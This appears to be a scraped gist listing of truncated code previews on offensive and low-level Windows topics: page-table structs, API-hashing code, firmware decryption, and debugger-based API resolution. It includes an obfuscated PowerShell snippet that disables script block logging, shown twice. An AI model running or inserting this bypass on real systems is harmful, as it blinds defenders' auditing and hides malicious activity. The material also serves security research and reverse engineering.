gavz

## ScriptBlockLogBypass.ps1
# ScriptBlock Logging Bypass
# @cobbr_io

$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }

## CheckHvpt.c
#include <stdio.h>
#include <assert.h>
#include <Windows.h>

// Some of them taken (and modified) from https://github.com/winsiderss/systeminformer

typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION
{
    BOOLEAN SecureKernelRunning : 1;
    BOOLEAN HvciEnabled : 1;

## 0000-thecus-firmware-decrypt.sh
#!/bin/bash

#
# This script takes a Thecus Firmware Image and decrypts it.
# The encryption key is based off of one of the supported
# models, which are listed in the firmware filename. This
# script will try all of the model names in the file name
# and delete any that do not decrypt to a gzip file.
#
# You will need the following c program compiled and passed

## log_and_scripts_api_resolving_with_x64dbg.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                gavz
                / log_and_scripts_api_resolving_with_x64dbg.md
            
            
              Created
              May 30, 2024 23:28
                — forked from a1ext/log_and_scripts_api_resolving_with_x64dbg.md
            
              
                Log and scripts used in the following video [Resolving APIs dynamically with Labeless & x64dbg] https://youtu.be/hMWuWVRkpB0
              
          
    Resolving APIs dynamically with Labeless & x64dbg

Previous part Resolving APIs dynamically with Labeless & OllyDbg2
Hi, now we try to do the same things using x64dbg with x64-bit target application...
Let's try to find out the difference we need to make in IDA python script...
As the base, I use the previous script (see video how to do the same in OllyDbg 2)

  
## get_proc_address.c
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String)
{
	SIZE_T Index = 0;
	UINT32 Hash = 0;
	SIZE_T Length = lstrlenA(String);

	while (Index != Length)
	{
		Hash += String[Index++];
		Hash += Hash << INITIAL_SEED;

## pml4e.c
typedef struct _PML4E
{
    union
    {
        struct
        {
            ULONG64 Present : 1;              // Must be 1, region invalid if 0.
            ULONG64 ReadWrite : 1;            // If 0, writes not allowed.
            ULONG64 UserSupervisor : 1;       // If 0, user-mode accesses not allowed.
            ULONG64 PageWriteThrough : 1;     // Determines the memory type used to access PDPT.

## pdpte.c
typedef struct _PDPTE
{
    union
    {
        struct
        {
            ULONG64 Present : 1;              // Must be 1, region invalid if 0.
            ULONG64 ReadWrite : 1;            // If 0, writes not allowed.
            ULONG64 UserSupervisor : 1;       // If 0, user-mode accesses not allowed.
            ULONG64 PageWriteThrough : 1;     // Determines the memory type used to access PD.

## pde.c
typedef struct _PDE
{
    union
    {
        struct
        {
            ULONG64 Present : 1;              // Must be 1, region invalid if 0.
            ULONG64 ReadWrite : 1;            // If 0, writes not allowed.
            ULONG64 UserSupervisor : 1;       // If 0, user-mode accesses not allowed.
            ULONG64 PageWriteThrough : 1;     // Determines the memory type used to access PT.

## pte.c
typedef struct _PTE
{
    union
    {
        struct
        {
            ULONG64 Present : 1;              // Must be 1, region invalid if 0.
            ULONG64 ReadWrite : 1;            // If 0, writes not allowed.
            ULONG64 UserSupervisor : 1;       // If 0, user-mode accesses not allowed.
            ULONG64 PageWriteThrough : 1;     // Determines the memory type used to access the memory.

## main.c
#include <windows.h>

int main() {
    HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ENCRYPTED|FILE_FLAG_DELETE_ON_CLOSE, NULL);
    if (!file || file == INVALID_HANDLE_VALUE) {
        return GetLastError();
    }
    CloseHandle(file);
    return 0;
}
	# ScriptBlock Logging Bypass
	# @cobbr_io

	$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
	If ($GroupPolicyField) {
	$GroupPolicyCache = $GroupPolicyField.GetValue($null)
	If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
	}
	#include <stdio.h>
	#include <assert.h>
	#include <Windows.h>

	// Some of them taken (and modified) from https://github.com/winsiderss/systeminformer

	typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION
	{
	BOOLEAN SecureKernelRunning : 1;
	BOOLEAN HvciEnabled : 1;
	#!/bin/bash

	#
	# This script takes a Thecus Firmware Image and decrypts it.
	# The encryption key is based off of one of the supported
	# models, which are listed in the firmware filename. This
	# script will try all of the model names in the file name
	# and delete any that do not decrypt to a gzip file.
	#
	# You will need the following c program compiled and passed
	UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String)
	{
	SIZE_T Index = 0;
	UINT32 Hash = 0;
	SIZE_T Length = lstrlenA(String);

	while (Index != Length)
	{
	Hash += String[Index++];
	Hash += Hash << INITIAL_SEED;
	typedef struct _PML4E
	{
	union
	{
	struct
	{
	ULONG64 Present : 1; // Must be 1, region invalid if 0.
	ULONG64 ReadWrite : 1; // If 0, writes not allowed.
	ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
	ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PDPT.
	typedef struct _PDPTE
	{
	union
	{
	struct
	{
	ULONG64 Present : 1; // Must be 1, region invalid if 0.
	ULONG64 ReadWrite : 1; // If 0, writes not allowed.
	ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
	ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PD.
	typedef struct _PDE
	{
	union
	{
	struct
	{
	ULONG64 Present : 1; // Must be 1, region invalid if 0.
	ULONG64 ReadWrite : 1; // If 0, writes not allowed.
	ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
	ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PT.
	typedef struct _PTE
	{
	union
	{
	struct
	{
	ULONG64 Present : 1; // Must be 1, region invalid if 0.
	ULONG64 ReadWrite : 1; // If 0, writes not allowed.
	ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
	ULONG64 PageWriteThrough : 1; // Determines the memory type used to access the memory.
	#include <windows.h>

	int main() {
	HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL\|FILE_ATTRIBUTE_ENCRYPTED\|FILE_FLAG_DELETE_ON_CLOSE, NULL);
	if (!file \|\| file == INVALID_HANDLE_VALUE) {
	return GetLastError();
	}
	CloseHandle(file);
	return 0;
	}